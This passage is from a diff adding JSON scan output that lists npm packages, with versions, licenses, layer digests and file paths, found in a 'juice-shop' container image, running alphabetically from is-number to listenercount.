"Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/is-number/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "is-number-like@1.0.8", + "Name": "is-number-like", + "Identifier": { + "PURL": "pkg:npm/is-number-like@1.0.8", + "UID": "15772f58d22ff182" + }, + "Version": "1.0.8", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/is-number-like/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "is-number-object@1.1.1", + "Name": "is-number-object", + "Identifier": { + "PURL": "pkg:npm/is-number-object@1.1.1", + "UID": "5c9657220f6d68de" + }, + "Version": "1.1.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/is-number-object/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "is-object@1.0.2", + "Name": "is-object", + "Identifier": { + "PURL": "pkg:npm/is-object@1.0.2", + "UID": "bcfa929e40ac3bfe" + }, + "Version": "1.0.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/is-object/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "is-plain-obj@1.1.0", + "Name": "is-plain-obj", + "Identifier": { + "PURL": "pkg:npm/is-plain-obj@1.1.0", + "UID": "350b40a4eeda29f7" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/is-plain-obj/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "is-plain-object@2.0.4", + "Name": "is-plain-object", + "Identifier": { + "PURL": "pkg:npm/is-plain-object@2.0.4", + "UID": "c11ad03034dcbf7c" + }, + "Version": "2.0.4", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/is-plain-object/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "is-promise@2.2.2", + "Name": "is-promise", + "Identifier": { + "PURL": "pkg:npm/is-promise@2.2.2", + "UID": "df3c27d2f20ca101" + }, + "Version": "2.2.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/is-promise/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "is-regex@1.2.1", + "Name": "is-regex", + "Identifier": { + "PURL": "pkg:npm/is-regex@1.2.1", + "UID": "cf63b86c99d148f7" + }, + "Version": "1.2.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/is-regex/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "is-relative@1.0.0", + "Name": "is-relative", + "Identifier": { + "PURL": "pkg:npm/is-relative@1.0.0", + "UID": "2930d2b2fed7c0bd" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/is-relative/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "is-retry-allowed@1.2.0", + "Name": "is-retry-allowed", + "Identifier": { + "PURL": "pkg:npm/is-retry-allowed@1.2.0", + "UID": "d0e105593b2f4359" + }, + "Version": "1.2.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/is-retry-allowed/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "is-set@2.0.3", + "Name": "is-set", + "Identifier": { + "PURL": "pkg:npm/is-set@2.0.3", + "UID": "8a84fb888a09f6de" + }, + "Version": "2.0.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/is-set/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "is-shared-array-buffer@1.0.4", + "Name": "is-shared-array-buffer", + "Identifier": { + "PURL": "pkg:npm/is-shared-array-buffer@1.0.4", + "UID": "b5bc978284507fb0" + }, + "Version": "1.0.4", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/is-shared-array-buffer/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "is-stream@1.1.0", + "Name": "is-stream", + "Identifier": { + "PURL": "pkg:npm/is-stream@1.1.0", + "UID": "ec44c349b9aa6e4b" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/is-stream/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "is-stream@2.0.1", + "Name": "is-stream", + "Identifier": { + "PURL": "pkg:npm/is-stream@2.0.1", + "UID": "a8c0030976017f4f" + }, + "Version": "2.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/winston/node_modules/is-stream/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "is-string@1.1.1", + "Name": "is-string", + "Identifier": { + "PURL": "pkg:npm/is-string@1.1.1", + "UID": "8c9ce05427406dca" + }, + "Version": "1.1.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/is-string/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "is-symbol@1.1.1", + "Name": "is-symbol", + "Identifier": { + "PURL": "pkg:npm/is-symbol@1.1.1", + "UID": "ed5659752ef59fb9" + }, + "Version": "1.1.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/is-symbol/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "is-typed-array@1.1.15", + "Name": "is-typed-array", + "Identifier": { + "PURL": "pkg:npm/is-typed-array@1.1.15", + "UID": "7e9c3948cc5f9c29" + }, + "Version": "1.1.15", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/is-typed-array/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "is-unc-path@1.0.0", + "Name": "is-unc-path", + "Identifier": { + "PURL": "pkg:npm/is-unc-path@1.0.0", + "UID": "171f984fa175617d" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/is-unc-path/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "is-weakmap@2.0.2", + "Name": "is-weakmap", + "Identifier": { + "PURL": "pkg:npm/is-weakmap@2.0.2", + "UID": "afd97baa74152de7" + }, + "Version": "2.0.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/is-weakmap/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "is-weakset@2.0.4", + "Name": "is-weakset", + "Identifier": { + "PURL": "pkg:npm/is-weakset@2.0.4", + "UID": "d9888cd929cb3265" + }, + "Version": "2.0.4", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/is-weakset/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "is-windows@1.0.2", + "Name": "is-windows", + "Identifier": { + "PURL": "pkg:npm/is-windows@1.0.2", + "UID": "958cb2a67e8ec745" + }, + "Version": "1.0.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/is-windows/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "isarray@0.0.1", + "Name": "isarray", + "Identifier": { + "PURL": "pkg:npm/isarray@0.0.1", + "UID": "b9d90d8e67187adf" + }, + "Version": "0.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sanitize-html/node_modules/isarray/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "isarray@1.0.0", + "Name": "isarray", + "Identifier": { + "PURL": "pkg:npm/isarray@1.0.0", + "UID": "7c5e8c33ff45a60" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/readable-stream/node_modules/isarray/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "isarray@2.0.5", + "Name": "isarray", + "Identifier": { + "PURL": "pkg:npm/isarray@2.0.5", + "UID": "52751d6b7d57444a" + }, + "Version": "2.0.5", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/isarray/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "isexe@2.0.0", + "Name": "isexe", + "Identifier": { + "PURL": "pkg:npm/isexe@2.0.0", + "UID": "989159554489a853" + }, + "Version": "2.0.0", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/isexe/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "isexe@3.1.5", + "Name": "isexe", + "Identifier": { + "PURL": "pkg:npm/isexe@3.1.5", + "UID": "8aa814b5d00fca6e" + }, + "Version": "3.1.5", + "Licenses": [ + "BlueOak-1.0.0" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/node-gyp/node_modules/isexe/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "isobject@3.0.1", + "Name": "isobject", + "Identifier": { + "PURL": "pkg:npm/isobject@3.0.1", + "UID": "ec05f2446815b19f" + }, + "Version": "3.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/isobject/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "isurl@1.0.0", + "Name": "isurl", + "Identifier": { + "PURL": "pkg:npm/isurl@1.0.0", + "UID": "512d4a902a55c9ee" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/isurl/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "jackspeak@3.4.3", + "Name": "jackspeak", + "Identifier": { + "PURL": "pkg:npm/jackspeak@3.4.3", + "UID": "52b92df90781c276" + }, + "Version": "3.4.3", + "Licenses": [ + "BlueOak-1.0.0" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/jackspeak/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "js-stringify@1.0.2", + "Name": "js-stringify", + "Identifier": { + "PURL": "pkg:npm/js-stringify@1.0.2", + "UID": "91b32eaeea0f5109" + }, + "Version": "1.0.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/js-stringify/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "js-tokens@4.0.0", + "Name": "js-tokens", + "Identifier": { + "PURL": "pkg:npm/js-tokens@4.0.0", + "UID": "221e49c351ca5949" + }, + "Version": "4.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/js-tokens/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "js-yaml@3.14.2", + "Name": "js-yaml", + "Identifier": { + "PURL": "pkg:npm/js-yaml@3.14.2", + "UID": "e7b5eca6735fcccd" + }, + "Version": "3.14.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/js-yaml/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "json-buffer@3.0.0", + "Name": "json-buffer", + "Identifier": { + "PURL": "pkg:npm/json-buffer@3.0.0", + "UID": "b09ca1f4d7b0fee4" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/cacheable-request/node_modules/json-buffer/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "json-schema@0.4.0", + "Name": "json-schema", + "Identifier": { + "PURL": "pkg:npm/json-schema@0.4.0", + "UID": "cf91fc2bea23384b" + }, + "Version": "0.4.0", + "Licenses": [ + "(AFL-2.1 OR BSD-3-Clause)" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/json-schema/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "json5@2.2.3", + "Name": "json5", + "Identifier": { + "PURL": "pkg:npm/json5@2.2.3", + "UID": "900f933d16e10861" + }, + "Version": "2.2.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/json5/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "jsonfile@6.2.1", + "Name": "jsonfile", + "Identifier": { + "PURL": "pkg:npm/jsonfile@6.2.1", + "UID": "37189142aec32789" + }, + "Version": "6.2.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/jsonfile/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "jsonwebtoken@0.1.0", + "Name": "jsonwebtoken", + "Identifier": { + "PURL": "pkg:npm/jsonwebtoken@0.1.0", + "UID": "313e8c07b7bef48a" + }, + "Version": "0.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/express-jwt/node_modules/jsonwebtoken/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "jsonwebtoken@0.4.0", + "Name": "jsonwebtoken", + "Identifier": { + "PURL": "pkg:npm/jsonwebtoken@0.4.0", + "UID": "57a7893154ba8d85" + }, + "Version": "0.4.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/jsonwebtoken/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "jstransformer@1.0.0", + "Name": "jstransformer", + "Identifier": { + "PURL": "pkg:npm/jstransformer@1.0.0", + "UID": "87f83fe9b487ffd2" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/jstransformer/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "juice-shop@20.0.0", + "Name": "juice-shop", + "Identifier": { + "PURL": "pkg:npm/juice-shop@20.0.0", + "UID": "d650b34f9b89d095" + }, + "Version": "20.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/build/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "juice-shop@20.0.0", + "Name": "juice-shop", + "Identifier": { + "PURL": "pkg:npm/juice-shop@20.0.0", + "UID": "f2f18964157145fd" + }, + "Version": "20.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "jwa@0.0.1", + "Name": "jwa", + "Identifier": { + "PURL": "pkg:npm/jwa@0.0.1", + "UID": "ad7b3fb5168a3d9d" + }, + "Version": "0.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/jwa/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "jws@0.2.6", + "Name": "jws", + "Identifier": { + "PURL": "pkg:npm/jws@0.2.6", + "UID": "1c4fc99df2fe2c15" + }, + "Version": "0.2.6", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/jws/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "keyv@3.0.0", + "Name": "keyv", + "Identifier": { + "PURL": "pkg:npm/keyv@3.0.0", + "UID": "21e4eebf69f74527" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/cacheable-request/node_modules/keyv/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "kind-of@6.0.3", + "Name": "kind-of", + "Identifier": { + "PURL": "pkg:npm/kind-of@6.0.3", + "UID": "5b240df01d8eb908" + }, + "Version": "6.0.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/kind-of/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "kuler@2.0.0", + "Name": "kuler", + "Identifier": { + "PURL": "pkg:npm/kuler@2.0.0", + "UID": "ea504a5055968d44" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/kuler/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "lazystream@1.0.1", + "Name": "lazystream", + "Identifier": { + "PURL": "pkg:npm/lazystream@1.0.1", + "UID": "bef7115eefa87bde" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/lazystream/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "libxmljs2@0.37.0", + "Name": "libxmljs2", + "Identifier": { + "PURL": "pkg:npm/libxmljs2@0.37.0", + "UID": "dd1f362a90b96bac" + }, + "Version": "0.37.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/libxmljs2/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "liftup@3.0.1", + "Name": "liftup", + "Identifier": { + "PURL": "pkg:npm/liftup@3.0.1", + "UID": "365b68ad7f5e2459" + }, + "Version": "3.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/liftup/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "linebreak@1.1.0", + "Name": "linebreak", + "Identifier": { + "PURL": "pkg:npm/linebreak@1.1.0", + "UID": "371ccd7b93589a2a" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/linebreak/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "listenercount@1.0.1", + "Name": "listenercount", + "Identifier": { + "PURL": "pkg:npm/listenercount@1.0.1", + "UID": "97ff264cdb419f80" + }, + "Version": "1.0.1", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/listenercount/package.json", + "AnalyzedBy": "node-pkg" + }, + { + 